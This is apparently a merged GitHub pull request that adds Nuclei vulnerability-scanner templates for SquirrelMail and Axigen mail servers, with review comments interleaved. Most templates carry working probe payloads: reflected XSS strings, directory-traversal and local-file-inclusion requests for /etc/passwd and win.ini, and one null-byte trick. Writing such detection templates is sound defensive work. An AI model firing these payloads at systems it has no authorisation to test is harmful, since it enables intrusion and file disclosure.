Merge pull request #3144 from DhiyaneshGeek/master

Axigen Mail Server & Squirrel Server
patch-1
Prince Chaddha 2021-11-16 16:09:21 +05:30 committed by GitHub
commit cacf934f38
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
9 changed files with 249 additions and 0 deletions


@ -0,0 +1,35 @@
id: CVE-2002-1131
info:
name: SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities
author: dhiyaneshDk
severity: medium
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/21811
tags: xss,squirrelmail,cve,cve2002
requests:
- method: GET
path:
- '{{BaseURL}}/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search'
- '{{BaseURL}}/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search'
- '{{BaseURL}}/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
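Review bot: The `description` of CVE-2002-1131 names the Virtual Keyboard plugin, but the five paths probe `addressbook.php`, `options.php`, `search.php` and `help.php`; the text appears to be copied from the vkeyboard template later in this commit. Anyone triaging a match would be pointed at the wrong component when deciding what to patch or disable. Suggest replacing it with `description: Multiple cross-site scripting vulnerabilities in SquirrelMail 1.2.6/1.2.7 reflect unsanitized query parameters in addressbook.php, options.php, search.php and help.php.`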


@ -0,0 +1,30 @@
id: CVE-2004-0519
info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
reference: https://www.exploit-db.com/exploits/24068
tags: xss,squirrelmail,cve2004,cve
requests:
- method: GET
path:
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
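Review bot: The only request path hard-codes a `/mail/` prefix (`{{BaseURL}}/mail/src/compose.php`), while every other SquirrelMail template in this commit requests `{{BaseURL}}/src/...`. An installation served from the web root or from a different directory will be reported clean even when it is vulnerable. Add a second entry under `path` that uses `{{BaseURL}}/src/compose.php` with the same query string, and set `stop-at-first-match: true` as the CVE-2002-1131 template does.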


@ -0,0 +1,25 @@
id: CVE-2006-2842
info:
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
author: dhiyaneshDk
severity: high
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
reference: https://www.exploit-db.com/exploits/27948
tags: cve2006,lfi,squirrelmail,cve
requests:
- method: GET
path:
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
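Review bot: The `name` announces a local file inclusion in `redirect.php`, while the `description` is the CVE text for a remote file inclusion in `functions/plugin.php` that needs `register_globals` on and `magic_quotes_gpc` off, so a reader cannot tell what a match or a miss proves. The request also depends on the trailing `%00` truncating the included path, which PHP releases from 5.3.4 onward reject. A negative result is therefore not evidence that the installation is patched. Suggest stating this in the template, for example `# Needs register_globals=On and null-byte path truncation; a miss does not prove the host is patched.`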


@ -0,0 +1,25 @@
id: CVE-2012-4940
info:
name: Axigen Mail Server - 'Filename' Directory Traversal
author: dhiyaneshDk
severity: high
description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in (1) the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in (2) an edit action or (3) a delete action to the default URI.
reference: https://www.exploit-db.com/exploits/37996
tags: cve,cve2012,axigen,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini'
- '{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini'
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
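Review bot: Both paths carry a fixed `h=44ea8a6603cbf54e245f37b4ddaf8f36`, which looks like a session-bound value copied from the referenced proof of concept rather than a constant of the product; please confirm. If it is per-session, and the View Log Files component sits behind the WebAdmin login as the description suggests, the template will miss vulnerable servers and give a false sense of coverage. Either obtain the value from a prior authenticated request or document the limitation in `description`. The matcher block also has no status check, unlike the other file-read templates in this commit; adding `- type: status` with `- 200` and `matchers-condition: and` would keep it consistent.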


@ -0,0 +1,24 @@
id: axigen-webadmin
info:
name: Axigen Web Admin
author: dhiyaneshDk
severity: info
metadata:
shodan-query: 'http.title:"Axigen&nbsp;WebAdmin"'
tags: axigen,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Axigen&nbsp;WebAdmin</title>'
- type: status
status:
- 200


@ -0,0 +1,24 @@
id: axigen-webmail
info:
name: Axigen WebMail
author: dhiyaneshDk
severity: info
metadata:
shodan-query: 'http.title:"Axigen WebMail"'
tags: axigen,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- '<title>Axigen WebMail</title>'
- type: status
status:
- 200


@ -0,0 +1,30 @@
id: squirrelmail-vkeyboard-xss
info:
name: SquirrelMail 1.4.2 Address Add Plugin - 'add.php' Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/26305
tags: xss,squirrelmail
requests:
- method: GET
path:
- '{{BaseURL}}/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
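Review bot: `id: squirrelmail-vkeyboard-xss` is used here for the Address Add plugin check and again for the Virtual Keyboard template in the last file of this commit. With the same id, findings from the two templates cannot be told apart in scan output, and neither can be selected or excluded on its own. Rename this one after what it tests, for example `id: squirrelmail-address-add-xss`, and leave the vkeyboard template with the existing id.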


@ -0,0 +1,26 @@
id: squirrelmail-lfi
info:
name: SquirrelMail 1.2.11 Local File Inclusion
author: dhiyaneshDk
severity: high
reference: https://www.exploit-db.com/exploits/22793
tags: lfi,squirrelmail
requests:
- method: GET
path:
- "{{BaseURL}}/src/read_body.php?mailbox=/etc/passwd&passed_id=1&"
- "{{BaseURL}}/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
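Review bot: This is the only vulnerability template in the commit without a `description`, so a high-severity finding reaches the reader with no statement of what was disclosed or through which parameter. Suggest adding under `info`: `description: SquirrelMail 1.2.11 is reported to disclose local files through the mailbox parameter of read_body.php and download.php.` The first path also ends in a stray `&` (`passed_id=1&`) that can be dropped.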


@ -0,0 +1,30 @@
id: squirrelmail-vkeyboard-xss
info:
name: SquirrelMail Virtual Keyboard Plugin - 'vkeyboard.php' Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/34814
tags: xss,squirrelmail
requests:
- method: GET
path:
- '{{BaseURL}}/plugins/vkeyboard/vkeyboard.php?passformname=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
words:
- "text/html"
part: header